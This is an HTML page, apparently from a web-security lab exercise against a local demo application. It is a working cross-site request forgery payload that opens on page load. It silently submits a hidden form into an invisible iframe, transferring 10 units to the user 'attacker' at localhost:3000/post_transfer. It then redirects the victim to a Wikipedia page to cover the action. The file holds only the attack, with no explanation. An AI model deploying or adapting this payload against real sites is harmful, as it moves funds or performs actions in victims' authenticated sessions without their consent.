<!DOCTYPE html>
<html>
    <head>
        <meta charset='utf-8'>
        <script>
            var exp=false;
            function load(){
                document.getElementById('task').submit();
                exp=true;
            }
            function escape(){
                if(exp == true){
                    window.location.replace("https://en.wikipedia.org/wiki/Grace_Hopper");
                }
            }
        </script>
    </head>
    <body onload="load()">
        <form id="task" method="POST" target="iframe" action="http://localhost:3000/post_transfer">
            <input name="destination_username" type="hidden" value="attacker">
            <input name="quantity" type="hidden" value="10">
        </form>
        <iframe style="width:0; height:0; border:0; border:none" name="iframe" onload="escape()"></iframe>
    </body>
</html>